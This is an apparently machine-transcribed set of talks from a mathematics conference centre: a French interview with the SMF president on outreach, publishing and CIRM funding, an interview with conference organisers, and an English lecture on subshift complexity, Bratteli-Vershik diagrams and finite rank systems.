bulletin de la SMF, on a plusieurs autres collections de livres, astérisques. C'est vraiment pour nous enseignants-chercheurs. On se déploie jusqu'au collège, pas encore jusqu'à l'alcool primaire, je ne sais pas si on le fera un jour, mais ça pourrait être une idée. Nous avons aussi au sein de la SMF différentes commissions, par exemple la Commission d'enseignement qui va te perdre un peu avec cette diffusion, où la SMF réfléchit aux grandes réformes, intervient, sollicite les médias ou est sollicité par les médias pour donner son avis. On travaille de façon très proche, elles sont représentées dans cette commission avec les associations de professeurs du secondaire. Il y a aussi une charge émission sur les droits humains. Vous connaissez peut-être, en 2021, il y a plusieurs cas de collègues à l'étranger qui sont enfermés, qui sont emprisonnés, je vais citer Azat Mikfakov, une professeure de l'Université du Caire dont j'ai oublié le nom, je m'en excuse. Et puis aussi Tuna Altinelle qui n'a toujours pas reçu son passeport, bien qu'il doit pouvoir sortir de Turquie. On agit de concert avec les associations qui sont très vigilantes pour ces personnes. On diffuse les informations, on utilise des nouveaux moyens de communication. Twitter, par exemple, on a maintenant une très belle page web sur laquelle on diffuse ces informations. On a un certain nombre d'adhérents, et puis l'ASMF c'est pas que le président ni son bureau ni son conseil d'administration, les membres qui sont adhérents, les adhérents de l'ASMF, peuvent nous solliciter pour leur faire part de nouvelles initiatives qui seraient à développer. On va développer une chaîne YouTube, on va mettre ces grands cycles de conférences pour qu'ils soient plus visibles, ils étaient déjà diffusés, mais sur des canaux peut-être moins connus du grand public. Des objectifs, on va dire, un peu impréciés parce qu'on est en phase de réflexion. Moi personnellement, comme dans mon université, j'aimais bien aller au contact du public de façon très proche, dans les collèges de la région. Je choisis à peu près une vingtaine en moyenne depuis 15 ans exposé dans les collégies lycées par an. L'ASMF a ces cycles de conférences qui sont visibles aussi par des chaînes YouTube, mais ça n'emplacera jamais, et là on a en cœur de l'actualité le fait de voir quelqu'un en chérant en os, avec qui on peut discuter avant, après. Moi, quand je vais dans les collèges lycées, je demande à manger à la cantine. Et ça, c'est un aspect qui manque et on en est conscient pour qu'on ait une diffusion un peu plus large. Alors on essaie de faire voyager nos cycles de conférences, mais peut-être qu'on devrait envisager autre chose. Alors moi, ce à quoi je pensais, c'est de par la France, et Animate avait fait un ressensement de cela. Beaucoup de collègues font ce que je faisais dans mon université, dans ma région. On a tous du matériel pédagogique, d'exposer, de diffusion, etc. Il faudrait peut-être qu'on pense à le mettre en commun. Nous, c'est ce qu'on fait dans notre université. J'avais créé quand j'étais directeur de mon unité une équipe ma de grand public, comme il en existe maintenant dans pas mal d'universités. Et ce qu'on avait fait, c'était de collecter et les exposé des différents collègues, voire en collecter aussi un scénario, on a exposé un intervalle entre deux cours, donc c'est 50 minutes, un scénario pour que l'on puisse se diffuser entre collègues, parce que sinon c'est toujours les mêmes qui sont sollicités, nos exposés. Alors moi, j'avais un truc sur les tours de magie que maintenant mes collègues font, une collègue, Karine Sorlin, avait fait un sur la crypto, elle nous a expliqué, nous a donné tout le matériel, maintenant on est plusieurs à pouvoir le réaliser. Et voilà, donc ça, réaliser ça à plus grande échelle, je y réfléchis, parce que ça permettrait peut-être de encore mieux diffuser toutes ces initiatives, parce que souvent, ceux qui en bénéficient, ce sont ceux qui sont près des grandes villes, ou parfois des collègues n'ont pas d'idée sur quel exposé faire. Voilà, donc ça, c'est une des choses, donc maintenant aussi, on s'aperçoit que d'habitude, donc le cycle un texte mathématicien qui est développé par la ICMF depuis très très longtemps, a lieu à la Bibliothèque Nationale de France, donc notre charge édmission à Gérard Musi qui s'en occupe, me dit que c'est essentiellement des lycées parisiens qui viennent, et souvent les mêmes, c'est génial, et c'est dommage. Donc moi j'aimerais bien que des élèves, je ne sais pas, d'analyser dans les ans, puissent venir, ils peuvent prendre un bus, etc. Mais on peut aussi faire se déplacer ces exposés, c'est ce qui se passe. Mais maintenant avec, on a développé du zoom, un tas de trucs, donc on est en train de penser à faire des exposés sur le mode un peu télé en direct. Mais dans ces cas-là, il faut, comme vous l'avez aussi, un réalisateur, donc ça demande un certain investissement, soit en personnel humain, en matériel. Donc on réfléchit un peu de concert avec Animate, qui ont aussi ce genre de besoin, à évoluer vers un modèle qui nous permettrait de diffuser, là on passerait de 300 spectateurs, peut-être 2000, 3000, ça serait génial, et en direct. Évidemment il y a toujours l'interaction humaine qui sera manquante, là cette semaine je suis à une conférence en hybride, c'est compliqué, mais on passerait de 300 à peut-être 2000, et ça c'est pas rien, et on pourrait toucher des collèges ou des lycées qui sont difficilement atteignables, pour donner un exemple. Dans ma région, des fois il faut faire 150 km sans autoroute, ici à Marseille, si on veut faire un exposé à Dignes, c'est long, c'est long. Un exposé d'une heure c'est une journée de transport. Donc voilà, moi j'ai toujours ça en tête, donc ça c'est un des projets. Les autres projets du point de vue éditorial, il faut vendre plus de livres, donc ça c'est l'aspect un peu commercial, mais je pense qu'on a un déficit de notoriété évident, l'ASMF vis-à-vis d'éditeurs comme Springer, mais eux c'est des machines de guerre, elles sévirent. Et donc nous on doit réfléchir à nouveau à la diffusion. Moi je pense à course spécialisée, qu'on devrait être plus proactif pour trouver de bons ouvrages qui sera accessible à nos étudiants de M2, Doctoran, Jeunes chercheurs et au-delà. Donc là on y pense avec Frédéric Bayard qui est là avec moi, à l'ASMF au niveau de l'édition, et aussi réfléchir aussi à des modèles économiques qui permettent d'aller vers la science ouverte. Essentiellement la science ouverte ultimement souhaite que tout soit gratuit, mais nous nous avons quand même des employés, et tout gratuit ça fait peur, puisque ça veut dire plus de rentrée d'argent, donc plus personne au sein de l'ASMF, donc il faut trouver un modèle économique qui nous permet d'être plus près d'un modèle, et je comprends, moi je suis le premier à vouloir que la recherche que nous produisons de nos chercheurs soit disponible à tout public français, puisque je suis payé par l'État français, et c'est dommage qu'il nous faille payer les abonnements pour avoir accès à ce que nous produisons. Un peu incroyable, mais c'est comme ça, et donc moi je suis très sensible à ce modèle, mais maintenant que je suis président, parce qu'une chose est d'être en séance chercheur, de dire, il faut que tout soit gratuit, une autre est d'être en responsabilité, de s'apercevoir que finalement c'est vrai que tout ça, c'est un coup, et on ne faut pas faire de bêtises, parce que l'ASMF a 150 ans, je n'ai pas envie qu'après moi, elle mette la clé sous la porte. Voilà, donc ça c'est pas simple, les avis aussi sont très divergents, on y réfléchit sérieusement, et je préfère ne pas dire ce qu'on a en tête, parce que sans doute que ça n'aura pas lieu, ça sera sous une autre forme, mais en tout cas avec notamment Frédéric Bayard, le bureau et le CA, ce sont des sujets récurrents, dont nous discutons. Donc on a comme beaucoup de structures, le bureau est un conseil d'administration, le conseil d'administration était lu, partiaire chaque année, donc on est 24, tous les ans on réélit 8 personnes, et puis au sein de ce CA, on choisit un bureau, et en gros le bureau s'occupe des affaires plutôt courantes, et le conseil d'administration, souvent c'est plutôt des gros enjeux financiers, et puis aussi de toutes ces prises de position où on a besoin de leur avis, des 24 représentants pour nous dire, oui on est d'accord pour que l'ISMF signe telle lettre, produisent telle lettre, telle document, qui soit envoyée à tel ou tel endroit. Je dois remercier d'ailleurs mon bureau et mon conseil d'administration, parce que je suis très bien entouré, et c'est bien de bien choisir aussi, bien choisir ou de... oui, parce qu'on sollicite des gens pour qu'ils se fassent élire, d'avoir des gens sur qui on peut compter, et la choisir mon bureau est formidable. Et aussi un message que je peux lancer, c'est que l'ISMF c'est pas seulement le président, le bureau, le conseil d'administration, le staff qui est formidable également, on a du personnel à Marseille et puis à Paris, à l'IHP, mais c'est aussi tous les adhérents, et même au-delà des adhérents, c'est-à-dire que si un adhérent ou quelqu'un d'autre a une initiative qu'il veut développer, il ne faut pas hésiter à nous soumettre l'idée, parce que nous, on est preneurs, on n'est qu'une représentation d'une partie, même thématiquement, au niveau des sensibilités, on ne vous reprend de pas tous, chers collègues. Donc on est vraiment très à l'écoute, certains le savent et nous sollicitent, surtout pour les droits humains par exemple, et une initiative par exemple en 2020 mais qui avait déjà mis en place, après l'assessor Stéphane Serès, c'est pour les docteurs agrégés, qui sont agrégés, ils font une thèse où ils l'ont finie, qui demandent des détachements auprès de leurs rectorats, et qui parfois ne l'ont pas. Donc cette année par exemple, il y en a 19 qui ne l'ont pas eu, donc dans ces cas-là on peut faire un recours, et nous on avait fait savoir que la SMF pouvait appuyer leurs demandes, et sur les 19, 18 finalement ont eu un recours qui est accepté, donc ils ont pu aller soit en post-doc, se poursuivre leur thèse en bonne condition, et l'un d'entre eux, le recours a été refusé, mais heureusement la SMF peut encore intervenir, donc là il faut aller encore plus haut, au-delà du rectorat, et ça va fonctionner. Il faut le savoir, on œuvre beaucoup pour l'enseignement, le collège, le lycée, on travaille avec les professeurs de collège et de lycée, de classe préparatoire, pour nos jeunes docteurs, oui une initiative aussi qui est mise en place par l'INSMI maintenant que j'y pense, c'est le réseau R2M qui permet à des gens qui ont encore envie de faire des mathématiques, qui ont un doctorat, mais qui se trouvent par exemple dans l'industrie ou dans un lycée en tant qu'enseignant de pouvoir être dans un labo en tant que chercheur associé. Et donc R2M, le réseau R2M, la SMF et l'INSMI essaient de favoriser cette insertion pour continuer à garder un contact avec le milieu de la recherche, parce que en général ces personnes n'ont pas d'argent du laboratoire, mais nous ça peut être une richesse dans le sens qu'on garde un contact avec l'industrie. Et ça c'est pas facile à mettre en place en général dans les laboratoires, si ce réseau pouvait contribuer notamment à cela, je pense que ça nous serait profitable lorsqu'on montre nos maquettes de Master 2 et qu'on cherche des professionnels sur certains thèmes, et bien d'avoir déjà des contacts grâce à ces professeurs associés, grâce à ce réseau R2M, ça facilite considérablement la mise en place de la maquette. En France, on est aussi en relation avec, et c'est assez récent, ça a été développé par mon prédécesseur Stéphane Sere, et une association est en train de se monter, c'est une association de société savante, qui est de l'actualité, l'AIPR. Des lettres ont été montées par cette association, la Soca-Cade pour l'instant, elle s'appelle, et qui ont permis de recueillir sur certains textes 80 signatures de société savante, là qui vont du sport, je sais pas quoi, aux langues germaniques, la physique, la biologie, etc. Donc là ça nous donne plus de poids, parce qu'un constat malheureux qui a été fait par Stéphane Sere, mon prédécesseur, c'est que lui il a beaucoup œuvré, avec Louis Nyssen, qui était à l'époque notre charge de mission, pour ou contre la réforme des lycées, en tout cas ils ont donné plutôt constructif par réactionnaire, ils ont proposé des pistes, des solutions, nos critiques, et bien le résultat a été nul, pour beaucoup d'énergie, des pensées. Donc l'idée ici est plutôt que de vrai, uniquement, enfin seul, d'essayer de travailler avec d'autres sociétés savantes, parce que là on n'est plus uniquement 2000 adhérents de l'ASMF, on commence à parler de dizaines de milliers de chercheurs, ça demande parfois à ne pas exiger exactement ce qu'on souhaiterait, parce qu'il faut un consensus pour consigner une lettre tous ensemble, ça c'est un exercice qui n'est pas simple, mais pour l'instant, il faut dire que la LPR était tellement fédérative contre elle chez les chercheurs, que c'était assez facile de signer tous ensemble, et donc là c'est en train de se construire, c'est en ce moment, là il faut que cet après-midi, je lise mes mails pour la constitution de cette nouvelle assemblée, et on espère que nous aurons plus de poids, mais malheureusement, à nouveau, pour la LPR, c'est beaucoup beaucoup d'énergie, pour un résultat nul. Donc, mais il faut s'armer de courage et continuer. Sous-titres par S.M.C. Et comme j'ai expliqué tout à l'heure, l'ASMF a vocation à diffuser les sciences mathématiques, le CIRM contribue, enfin tout le monde le sait, c'est le plus grand centre mondial de conférences en mathématiques, moi, étant étudiant en luminiques, lorsque j'ai fait ma thèse, j'ai pu en bénéficier, et c'est un lieu absolument incroyable, il faut le dire, sa bibliothèque, où ne serait-ce que tout ce programme, qui malheureusement, en 2020, a été diminué de 3 quarts, à peu près, et donc on agit de concert, avec le directeur actuel Pascal Hubert, mais avec Patrick Foulon aussi, préalablement, ce sont des entretiens réguliers, plusieurs fois par mois, sur différents sujets. Ce que je regrette un peu, en arrivant à l'ASMF, parce que moi-même, en tant qu'ancien chercheur, avant cela, je n'étais peut-être pas assez conscient de cela, c'est du travail réalisé par l'ASMF, au travers du CIRM, pour le bénéfice de tous les collègues, et de l'INSMI aussi, et de ex-Marseille, université, parce que souvent, je parle donc pour moi, quand on arrive ici, on a l'impression que ça existe, donc on en bénéficie, et c'est normal, les séjours sont, pour une bonne partie, beaucoup, sont gratuits, donc c'est gratuit. Et non, et en fait, les chiffres, quand on assiste au premier CA, où il y a le commissaire au compte qui parle et qui les présente, on s'aperçoit que derrière, il y a forcément beaucoup de travail, puisque le budget du CIRM est absolument colossal, c'est quelque chose, un de mémoire, entre 4 et 5 millions d'euros par an, pour entre 4 000 et 5 000 conférenciers, participants, ça veut dire des frais par participant qui s'élèvent à 900 euros. Et vous le savez, les frais que l'on fait payer à nos collègues lorsqu'ils le payent, c'est 525 euros je crois, il manque 400 euros. Mais bon, ça veut dire que le CIRM, l'INSMI, l'ASMF, ils sont derrière pour aller chercher des subventions, pour faire que ça fonctionne, pour optimiser aussi les dépenses, etc. Une chose qu'on ne sait pas, je ne savais pas non plus, c'est aussi l'ASMF qui présente les comptes du CIRM devant le commissaire au compte, puisque du point de vue financier, les comptes de l'ASMF ou du CIRM, c'est la même chose, c'est tous ensemble. Donc, de facto, on doit être très, très vigilant, mais de toute façon, évidemment le président de l'ASMF, lui, il fait en tire confiance, et c'est lui le chef, c'est le directeur du CIRM. Donc nous, que nous apporte le CIRM, comme je le disais tout à l'heure, on peut se faire valoir d'aller des collégiens aux médailles fields qui viennent ici assister à ces conférences, et donc d'avoir un spectre absolument colossal de diffusion des mathématiques. On est toujours vigilant à les faire évoluer, je crois que le travail qu'a effectué Patrick Foulon, qui a été malheureusement, mois après mois, pietiné par la crise sanitaire, mais malgré tout, il a essayé de trouver des idées pour que financièrement, ça tienne. Pascal l'a remplacé le 1er septembre, et il a trouvé, c'est vrai que la fraîcheur, parce que Patrick, ça faisait 10 ans qu'il était là, la fraîcheur d'un nouveau directeur, il a d'autres idées, il a peut-être plus de recul, il a moins la tête dans le guidon, et là, il a fait évoluer, en concertation d'autres façons avec Patrick, au mois de juillet et d'août, le modèle économique du CIRM en deux façons temporaires, mais sans doute que ça va affecter de façon durable, la façon d'attribuer ces fameux séjour gratuits, la réactivité de faire des conférences en plus petite comité, ce que permet maintenant, ce qu'a réalisé pendant son mandat, c'est deux mandats Patrick Foulon, qui est le CMF avec Linzmi et avec Ex-Marcet Université, donc c'est un nouveau bâtiment absolument magnifique, et là, ils ont le potentiel pour accueillir en parallèle de grandes conférences, des plus petites conférences, et là, on a hâte de voir une année normale, cette crise sanitaire, pour voir qu'est-ce que peut donner le CIRM. En 2019, ils avaient accueilli, je crois que c'était un record, 4900 participants, alors qu'on prenait possession seulement de tous ces bâtiments et qu'on n'avait pas exploité le potentiel complet. Donc on peut espérer, je l'espère pour le CIRM, les 5000 participants, voilà, de souris d'année standard.
|
Interview de Fabien Durand, mathématicien à l'Université de Picardie Jules Verne, président de la Société Mathématique de France depuis le 1er juillet 2020.
|
10.5446/54141 (DOI)
|
Je suis ancien chercheur à l'Université de Picard et Jules Verne. J'ai fait mes études à Marseille. J'ai habité pendant un temps à la Cité Universitaire qui était à Depeade-ici. Je suis allé à Amiens et je suis actuellement présent de la SMF. Voici pour les présentations. Mon thème, qu'est-ce qu'elle est-il? Ce sont ce qui s'appelle les sous-chiftes. Pour le public averti, j'ai travaillé sur des ensembles de cantors et regardé des transformations sur l'ensemble de cantors. Pour moi, pas question de dériver. Je dérive très peu, ce qui est un peu surprenant. Les outils que l'on utilise, ça va être les outils de la ligne fonctionnelle, de la gèbre, de la combinatoire, de l'informatique théorique, les ordinateurs, parce que les histoires de décidabilité, d'algorithmes qui montrent certains objets. Je m'appelle Samuel Petite, je suis enseignant chercheur à l'Université de Picardie-Jules Verne, même à l'université que Fabien. J'ai fait ma thèse à Dijon, à l'université de Bourgogne. Ensuite, j'ai eu un postataire à Marseille, ici, et ensuite, j'ai eu mon post à l'université de Picardie. Concernant mes thématiques de recherche, ça rend plutôt dans le domaine des systèmes dynamiques, des actions de groupe, principalement sur l'ensemble de cantors. Donc, ces outils que j'utilise, c'est un petit peu les mêmes que ceux de Fabien, avec peut-être un peu plus d'algébres, un peu plus de théories des groupes et des idées de la géométrie des groupes sur ces ensembles-là. On a l'habitude d'organiser cette conférence qui est à l'interface, avec l'informatique théorique, les systèmes dynamiques. Dans cette conférence, il y a beaucoup plus d'algébes, de théories des groupes, des actions de groupe, que l'on étudie systématiquement. C'est un thème qui est existé depuis longtemps, mais là, on voit que la communauté d'informatique théorique, cela proprit via les pavages, via ce qu'on appelle des sous-chiftes. Nous, on avait envie d'organiser une conférence autour de ces nouveaux aspects qui sont en train de se développer. Cela n'empêche qu'on développe également, il y a place pour des exposés sur les plus anciens sujets, des sujets récurrents qui nous tiennent à cœur. Et nous, ce qu'on souhaite, c'est toujours être bien à l'interface, faire venir des collègues et des laboratoires d'informatique. Donc là, on est dans des réseaux GDR, on diffuse cette information et ça marche. À chaque fois, je crois que les gens sont plutôt contents en général. Pour compléter ce que disait Fabien, en fait, ça va dans les deux sens, ça enrichissant pour différents domaines, en particulier ça enrichit aussi le domaine informatique. Mais aussi, ce qui est connu en informatique, apporter des exemples nouveaux d'un autre regard et d'autres problématiques sur les choses plus de théorie des groupes, plus algébriques, on dirait. Donc ça s'enrichit les uns les autres, c'est vraiment une confluence de thématiques qui s'enrichissent. Ils sont plus doués aussi pour faire des belles images. Oui, les informations. Il y a un côté graphique et esthétique qui est toujours intéressant. Moi, je dois dire que des fois, j'invite des gens juste parce que je sais qu'ils vont me parler de ma intéressante, mais aussi qu'ils vont avoir de belles illustrations. Et ça, des fois, les matheux sont peut-être moins doués pour cela. Nous sommes 24 qui dorment au CIRN, une dizaine de collègues marseillais qui sont ici en présentiel. On va dire, bon, chaque journée, on doit être une 30, 35 ici dans cette salle. Et puis avec 80 personnes en visio et puis un total de participants de 237, je crois. Et la difficulté, c'est vrai que, comme on ratisse du Chili, du Colorado jusqu'au Japon, au niveau emploi du temps, c'est un peu compliqué. Et donc, l'après-midi, on a nos collègues et amis états-uniens à l'ouest de la France. Et puis, le matin, on a des collègues iraniens japonais qui sont là. Donc, c'est un peu la difficulté technique. Ça se passe plutôt pas mal. Les exposés sont toujours bons. Alors, en 2009, on avait fait un truc qui s'appelait Subtil. Et entre deux, on avait organisé une quatorze semaines sur l'île d'Oléon. Sur ce thème, on avait fait venir 250 personnes, si je me souviens bien. Elle n'était pas là en permanence. Et nous, sinon, on organise régulièrement, nous, les collègues, des journées dans nos universités respectives. Mais en gros, pour marquer le coup, c'est bien que régulièrement, il y ait des gros événements. Et là, on parle de nous deux, mais on a d'autres collègues, évidemment, qui sont venus aussi. Nous, on vient en tant que participants. Donc, c'est assez, on va dire, une fois tous les deux ans, au moins, il y a ce type d'événements ici au CIRM. Et on a la chance aussi que, on va dire, une des meilleures équipements, la meilleure équipe en France, elle est à Marseille. Donc, ils ont un accès bien plus direct. Et ce qui fait qu'en nous, on a la chance de venir assez souvent.
|
This conference will gather researchers working on different topics such as combinatorics, computer science, probability, geometry, physics, quasicrystallography, ... but sharing a common interest: dynamical systems and more precisely subshifts, tilings and group actions. It will focus on algebraic and dynamical invariants such as group automorphisms, growth of symbolic complexity, Rauzy graphs, dimension groups, cohomology groups, full groups, dynamical spectrum, amenability, proximal pairs, ... With this conference we aim to spread out these invariants outside of their original domains and to deepen their connections with combinatorial and dynamical properties.
|
10.5446/54142 (DOI)
|
This talk is about some combinatorial, anthropological aspects of finite rank systems. I will start recalling the basic definitions and give some of the problematic. I will serve it a few results, then try to give some ideas on some special topics and then ask a few questions that we have. Please, if you have any questions, just let me know. Probably this will appear many times the basic definitions, so I will go more or less quickly. I will take a finite alphabet and I will here I will write the shift as the transformation S. I will not use the letter sigma because I will use that later. Capital S will be the shift, this is the shift map. Here I will be working with close subsets of a shift space that I will call generically, sorry here it should be S. I will call generically. Sorry. Hi, Sebastian. I think all I see are two arrows chasing themselves. We don't see the slides. Ah, you don't see the slides. Okay. Maybe only the organizers see. Okay, some people see. I can see. Okay, with my computer, sorry about that. Okay. Just let me know if there is any problem. Okay. So here we have I will use this generic notation to denote the sub-shift and as usual we say that the word, this is finite word, finite sequence of symbols appears in the shift if you can see that word in some point of your shift space. And this is also probably well known. The language of words of size length, N, is it's all the finite words that appear somewhere in X. And here this is one that would be one of the main objects we will study. This is the complexity, the complexity function. I apologize for my bad handwriting. This is the complexity function that counts the number of finite length words, the words of length N in the subject. And just to recall the topological entropy, I will write it like that, of the sub-shift is just the exponential growth rate of this function. This is the limit of the logarithm of this function and you divide that by N. This is the topological entropy. And this quantity, the complexity function, has been studied by several authors and some restricted cases, this complexity function tells us some things about the system itself. So let me go to the next one. And some motivation about this complexity function is that there are some complexity restrictions for systems regarding this complexity function. So probably the most well known result is when your system is finite, if not only if this complexity function is bounded. The next step is what I will call the non-superlinear complexity case, which will be when the lemmins, which will be when the lemmins of the complexity function divided by N, this is a finite number. So this will be the non-superlinear complexity. And this case poses several restrictions. And let me just start with the obvious one. The system, having this condition, they have zero entropy. This is just because the entropy is the exponential growth rate of this. And if this is, say, it has this growth rate condition, this cannot be positive. So this is almost immediate consequence. And less trivial consequence is that systems like this have a finite number of ergodic measures. So let's say finite number of ergodic measures. And here let me mention some names. So this was first observed by Bočer Niedsen in, I think, 1985, 84. We showed that this number here bounds, or this number, if this number is finite, then you have a finite number of ergodic measures. And here ergodic measures are all the invariant, so all the extreme points of the set of invariant measures. And this property has been studied more in details very recently. So let me mention there are some recent results by Van Sier and Braynacra. This is, I think, 2019, where they studied the number of ergodic measures and genetic measures and give a more precise bounds. I will just comment that this has been studied recently. Just to give a complete list of references, there is also a result by Damron and Fikentcher. I'm sorry if I'm pronouncing it wrongly. This is 2017. And I think this will be something related to their result will be in a talk tomorrow. So I advertise this talk about related results. And there is also a recent paper by Dijkstra, Ampavlov, where they extend results to transitive substitutes. So here everything is minimal. They study for, give more results for transitive systems. Okay, so this is just to say that systems with this condition have some rigidity properties. And I mean rigidity in a very vague sense. Rigidity is what I'm writing here. That they have zero entropy, they have a finite number of ergodic measures. And there is another property that this system has. And is that, I will maybe call it here. And that they have a restricted automorphism group or constrained automorphism group. Constraint automorphism group. And here the automorphism group of this shift is all the automorphisms, they call it H, all the automorphisms such that they commute with the shift action. So this is the automorphism group. And in these systems, this is constrained. And this is, there are also very recent results about this question. And I think to be more or less complete with the references, the first result in this direction was given by Salo and Torma. I think this is 2013, where they show that, maybe I will write here the condition. Is that if you consider the automorphism group and you quotient by the group generated by the shift, this is fine. So this is, it was first observed by, proved by Salo and Torma in 2013 for some classes of substitutions. And then we have Van Siet and Brian Acra. And also myself with Fabian, Fabian Durand, Alejandro Mas and Samuel Petit, where we show that non-superlinear complexity, so the condition having the limit, the complexity finite. This is the non-superlinear condition. This implies that this object is finite. The group of the automorphism divided by the shift, where the group generated by the shift is a finite group. And so that is, sorry, I forgot to mention here that is also a was, sorry, I forget if I write correctly and coven I think. Let's say around the same time. And actually all this result used a condition, I will call three prime, which is that this algebraic condition is a consequence of having finite number of asymptotic component, finite number of asymptotic components. And what is this? So two points in the sub-shift are asymptotic. If they are equal, they have equal values starting from some point. So the typical, this picture is some slay that. So starting from some point, the sequences coincide and after that point, they differ somewhere. Probably we can think that they differ there. And after that they are equal. And being asymptotic is an equivalence relation, so you can talk about asymptotic components. And the property behind this property three is that such systems with this condition have a finite number of asymptotic components. So to summarize this slide, we have this complexity restriction and we want to understand what rigidity properties implies. So here I mention three or four of them. Any questions so far? Sorry, is it working? Yes, okay. When you say finite number of asymptotic component, so do you mean like any configuration is not asymptotic to itself? Because if this holds then... Ah yes, yes, sorry. Non-trivial asymptotic. Non-trivial. Okay, so here I have some restrictions. Let me go up zero entropy, finite number of erythrofagotic measures constrained automorphism group and this finite number of asymptotic components, not trivial asymptotic components. So then we can ask if all these restrictions that appear here are really... maybe they are more general. Maybe they appear in some... with some topological assumption more general than this combinatorial property. So if you look at the restrictions one and two that I have here, zero entropy and finite number of erythrofagotic measures, one could guess a class of systems that one could try to understand to see if all... if those systems are actually... if that class of system is actually the one having all these restrictions that I mentioned here. So I have that and this is what we call the finite rank systems and to define finite rank systems which is the the title, I will have to introduce briefly what is called the Bratelli-Versic diagram. Probably there will be more talks about this, so I will spend a few minutes talking about this representation and then mention some results. Okay, so as I mentioned before, the motivation was to understand all these restrictions that the non-superlinear complexity gives and try to see if there is some more general class maybe defined not in that combinatorial terms as having non-superlinear complexity that also has all those rigidity properties and that's what will be the class of finite rank systems that I will introduce in a few more. Okay, so to do that I have to tell you about the Bratelli-Versic diagrams. So what is a Bratelli-Versic diagram? It's a graph, infinite graph where you can put different vertices in different levels and you can connect say a level with the next one and with nothing else. So you can you put together all vertices in a given level and then you have an infinite graph like this and the assumption is that here you have one special vertex which is the root of the diagram. So here I have vertices edges between levels and that's basically what is a Bratelli-Versic diagram. Okay, so between two levels I will call those levels and in principle I should name them all differently. So this should be 1 sub n minus 1 but to lighten the notation I will just write 1, 2, 3 etc. So these are what are called levels. You have in one level a set of vertices and in the next level you have another set of vertices, different vertices and what you have is you have some edges connecting them and that's the structure of a given level and you have that for infinitely many levels and this gives you a Bratelli-Dig. Okay and the next thing concerning these structures is for any given vertex you have an order in the edges that arrive to that vertex like the edges like that are pointing up say and here I wrote this order 1, 2, 3, 4 but this I will be considering this type of order but it's just for convenience. I will order them from left to the right but this could be any order could be 1, could be 1, 3, 2 etc. It can be any order but for the sake of the character I will just I will mainly use from left to the right and having done that you can create what's called the Bratelli-Versic map which is as follows and I will not describe it formally, I will just give a few examples and let's hope things will be clear. So given this Bratelli diagram you can associate the set of all infinite paths is the set of all infinite paths. When I mean paths I will read the edges of this graph this is an infinite path and we can define the Bratelli-Versic map as the successor map so I will give this example here and let's see if it's clear. This is actually the most easy example one can imagine. We will have one vertex at each level and we will connect with two edges to the next one so here this continues I just wrote a portion of it and here I'm drawing one path this one in green so the successor map will be I will look down till I find something that is not maximum here I'm also considering the order from left to right so this is smaller than this one so remember in each vertex I had an order that allows me to compare the edges that are arriving to this vertex so if we look at this path in green so the rule is I will look down till I find something that is not maximum so here if I start looking down I will find this edge that is not maximum so I will mark it it's not maximum and what I will do I will move it to the next one in the order I had so here I'm given an order I will move it to the next one so this will move to the next one and I erase everything I had above but I erase what I had before and to draw what I had here I will come back with the minimum path so I will choose at any step the minimum path that allows me to come back so in this case it's just that so this is the this is the successor map and if we think of this as the sequence of zeros and ones so where say this is a zero and this is one so the one in the left is a zero and the one in the right is one what we have done here is that let me go back is that here the the sequence will be one zero zero so what we did is that one zero zero something it went to sorry no I didn't have I have that one one zero zero it's okay one zero zero it went to zero one zero so this is an this can be seen as adding one in the in this daily group and what is adding one I add the coordinate and if and I keep the the how it's called the I forgot the name in English so carry here when I add one the carry yes sorry the I add the I add one here so this one becomes zero and I keep the carry here and I put it there and I continue like that so someone that if you haven't looked at this kind of dynamics if you have never looked at this then maybe you are asking yourself what happens if I never find the something that is not maximum well in that case you send to the path that is everything is a minimum of course if that is well defined if there is only one maximum and one okay but this is just to give a taste of what is a dynamics in this kind of maps this example here is what is called an odometer it's an odometer or adding machine so you have a group operation and what you're doing the successor dynamics is adding some fixed element so this is an odometer and what is the particular particular aspect of the odometer is that in each level you have one one vertex and actually that's what characterize the odometers in this context okay so and then I will just draw a few pictures that so you can imagine what happens when you have more complicated structure here the structure was quite simple just one vertex at each level but you can have much more complicated structures and the dynamics is exactly the same it's just more difficult to look at it but the idea is the same so here for instance let's consider this this path in green of course this continues down but I just draw a portion of it so the dynamics is you go down till you find something that you can move something that is not the maximum so in this case so this is maximum this is maximum and this is not maximum so I should be able to move that one so I mark that as non-the maximum and then I move it there and then I come back to the to the top following the minimum path so that's one iteration of the successor map and if your if your graph is complicated enough you will have a complicated enough dynamics so that's what I wanted to say about these maps any question not please let me know if you have any question okay so why one could one could ask after all these definitions what is the class of systems that can be built like that like that and here two important theorems are the following ones just to mention the condition that we will be using the diagram is simple if you can connect no to vertices that are far away in the diagram and this is the condition to have a minimal dynamic minimal dynamics means that every orbit is a dance is dancing in the space so say a fundamental result in this context is a theorem in the 92 by Herman Putman and Scho that show that actually any minimal counter dynamics any minimal counter system can be represented in this way so and here minimal counter system means that is a minimal topological system and this space is a counter space so this is a counter space so this is kind of a universality or represent representation theorem of all dynamics that happen in a counter system in a counter space all of them can be represented as I said before so the class of systems we can treat with these diagrams is quite big it's all counter systems and the definition we will be discussing next is the one of finite rank the one here finite rank so a system is a finite rank if I can represent it as previously with the diagram where the number of vertices doesn't increase to infinity so let me go back here here I could have that when I go more down the number of vertices can go to infinity and this is a valid system the systems of all the dynamics but in the case where this doesn't happen or when you can represent it in a way that this doesn't happen this is called a finite rank system so all systems that can be represented in this way and this class of system starts to exhibit some rigidity properties and the first one is this theorem by Tomas Nonarovich and Alejandro Mas from 2008 that says that if you have a system like this where you can or that can be represented with a diagram finite where the number of vertices is bounded then it's either expansive meaning a subshift or an odometer like the situation I draw in the beginning you have one vertex and you just you are just adding a fixed number the fixed element in that group so this is a dichotomy theorem that says everything in that class is a subshift or it's an a key continue system it's a rotation in on a compact delin group so here we have a first restriction to this class because if you are wondering counter space it can be all subshifts are happening in a counter space but you can have things that are not expansive so not everything is a subject okay so this is a very first result and this the theorem says that well more or less we can focus on on subshifts because the other case would be odometer and odometer is easier to understand and this class of systems was studied in details in 2012 by Besugli, Tiatowski, Medinet and Solomniac and they exhibited they exhibited some rigidity properties that I will briefly mention here and the first property they prove is that they have a finite number of ergodic measures finite number of ergodic measures as much as like in the case of non-superlina complexity actually the number of ergodic measures is bounded by the rank bounded less than the rank so the maybe I didn't mention the rank is like the number of vertices that you can use at each level to represent the system the minimum number and so the system have finite number of ergodic measures and they have zero entropy what they showed is that they have zero entropy for any invariant measure which of course implies that the vibrational principle that the topological entropy is zero so we have these rigidity conditions in this class which are the ones I mentioned in the beginning that happen for non-superlinear systems so here we can ask what how about the next the next restriction so let me and before presenting the next restriction I will put in context this class of systems with the the condition we had 